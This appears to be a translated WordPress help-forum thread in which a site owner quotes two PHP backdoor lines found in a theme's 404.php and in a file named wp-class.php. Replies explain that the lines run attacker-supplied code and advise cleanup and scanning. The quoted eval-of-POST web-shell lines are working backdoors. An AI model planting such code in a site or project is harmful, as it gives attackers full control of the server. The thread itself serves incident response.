Suspicious Files 时间:2013-04-13 作者:qaedus 嗨,我在我的网站上发现了两个可疑文件:我的主题中的第一个(404.php), 添加此行后<?php if ($_POST["php"]){eval(base64_decode($_POST["php"]));exit;} ?>/wp-admin/ 调用wp-class.php.唯一的一行是:<?eval($_POST[joao]);?>有人能告诉我这是做什么的,我应该采取什么步骤吗? 2 个回复 SO网友:fuxia 当某人发送带有变量的POST请求时php 以及一个base 64编码值,即解码后的PHP代码,该PHP代码将以您自己的所有PHP文件的权限运行。攻击者可以读取所有数据库内容、创建新用户、上载文件…第二段代码也是这样,只是没有对PHP进行编码。两种注射都很原始;它们看起来似乎应该让你在移除它们时感到安全。这些片段很可能不是唯一的问题。攻击者可能使用了他的新站点并添加了一些文件。阅读Verifying that I have fully removed a WordPress hack? 并遵循此处提到的所有建议。找到后门。如果日志文件尚未泄露,请阅读它们。 SO网友:Orun 这些代码行几乎肯定是恶意的。为了阻碍网站管理员搜索字符串的能力,恶意内容通常以编码格式隐藏,如base64。根据我的经验,这种攻击最常见的版本是输出一个隐藏的iframe,加载一个外部恶意URL(可能用于多种目的)。使用扫描您的网站Quttera (internally) 和Sucuri (externally) 并查看是否可以识别和删除所有攻击实例。 结束 文章导航
